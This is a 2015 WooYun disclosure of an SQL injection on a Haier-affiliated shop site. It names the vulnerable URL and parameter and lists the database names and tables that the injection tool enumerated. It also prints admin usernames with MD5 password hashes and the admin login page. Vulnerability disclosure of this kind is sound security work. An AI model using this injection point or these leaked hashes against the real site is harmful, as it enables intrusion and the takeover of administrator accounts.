当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136277

漏洞标题:海尔集团某站SQL注入漏洞

相关厂商:海尔集团

漏洞作者: M4sk

提交时间:2015-08-24 18:49

修复时间:2015-08-29 18:50

公开时间:2015-08-29 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 ©2013 青岛海尔施特劳斯水设备有限公司 版权所有

Target: 		http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160
Host IP: 223.6.248.180
Powered-by: PHP/5.3.29
DB Server: MySQL >=5
Resp. Time(avg): 96 ms
Current User: haier@10.168.25.55:20635
Sql Version: 5.5.18.1-log
Current DB: shitelaoshi
System User: haier@10.168.25.55:20647
DB User: 'haier'@'%'
Data Bases: information_schema
mysql
performance_schema
shitelaoshi
stls_lt
stls_shop
watermaker


shitelaoshi
Table Name Columns
yanyu_address
yanyu_admin
yanyu_admin_panel
yanyu_admin_role
yanyu_admin_role_priv
yanyu_announce
yanyu_attachment
yanyu_attachment_index
yanyu_badword
yanyu_block
yanyu_block_history
yanyu_block_priv
yanyu_cache
yanyu_category
yanyu_category_priv
yanyu_collection_content
yanyu_collection_history
yanyu_collection_node
yanyu_collection_program
yanyu_comment
yanyu_comment_check
yanyu_comment_data_1
yanyu_comment_setting
yanyu_comment_table
yanyu_content_check
yanyu_copyfrom
yanyu_datacall
yanyu_dbsource
yanyu_download
yanyu_download_data
yanyu_downservers
yanyu_extend_setting
yanyu_favorite
yanyu_flashbanner
yanyu_flashbanner_data
yanyu_form_baoxiu
yanyu_form_huodong
yanyu_form_lianxi
yanyu_form_lipinjuan
yanyu_form_user_reg
yanyu_form_wenti
yanyu_goods
yanyu_goods_data
yanyu_hits
yanyu_ipbanned
yanyu_keylink
yanyu_keyword
yanyu_keyword_data
yanyu_link
yanyu_linkage
yanyu_log
yanyu_member
yanyu_member_detail
yanyu_member_group
yanyu_member_menu
yanyu_member_verify
yanyu_member_vip
yanyu_menu
yanyu_message
yanyu_message_data
yanyu_message_group
yanyu_model
yanyu_model_field
yanyu_module
yanyu_mood
yanyu_news
yanyu_news_data
yanyu_order_cart
yanyu_order_content
yanyu_order_logistics
yanyu_page
yanyu_pay_account
yanyu_pay_payment
yanyu_pay_spend
yanyu_picture
yanyu_picture_data
yanyu_position
yanyu_position_data
yanyu_poster
yanyu_poster_201401
yanyu_poster_201402
yanyu_poster_201407
yanyu_poster_201408
yanyu_poster_201412
yanyu_poster_201501
yanyu_poster_201502
yanyu_poster_201503
yanyu_poster_201504
yanyu_poster_201505
yanyu_poster_201506
yanyu_poster_201507
yanyu_poster_201508
yanyu_poster_space
yanyu_queue
yanyu_release_point
yanyu_search
yanyu_search_keyword
yanyu_session
yanyu_shop
yanyu_shop_data
yanyu_site
yanyu_sms_report
yanyu_special
yanyu_special_c_data
yanyu_special_content
yanyu_specifications
yanyu_specifications_data
yanyu_sphinx_counter
yanyu_sso_admin
yanyu_sso_applications
yanyu_sso_members
yanyu_sso_messagequeue
yanyu_sso_session
yanyu_sso_settings
yanyu_tag
yanyu_template_bak
yanyu_times
yanyu_type
yanyu_urlrule
yanyu_video
yanyu_video_data
yanyu_vote_data
yanyu_vote_option
yanyu_vote_subject
yanyu_wangdian
yanyu_wangdian_data
yanyu_wap
yanyu_wap_type


Data Base: shitelaoshi
Table: yanyu_admin
Total Rows: 3
userid username password
1 yanyu 79c8727efc9a2f6796e2ce7ef6456a4d
2 admin 4cbb1240471931aaa9799313074ceafb
4 stls 2c648f7ba5cfa09c2e71fdf59e7ca481
http://www.hswzyj.com/shop/admin/privilege.php?act=login
后天的地址
由于MD5没解开就不深入了
..

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-29 18:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无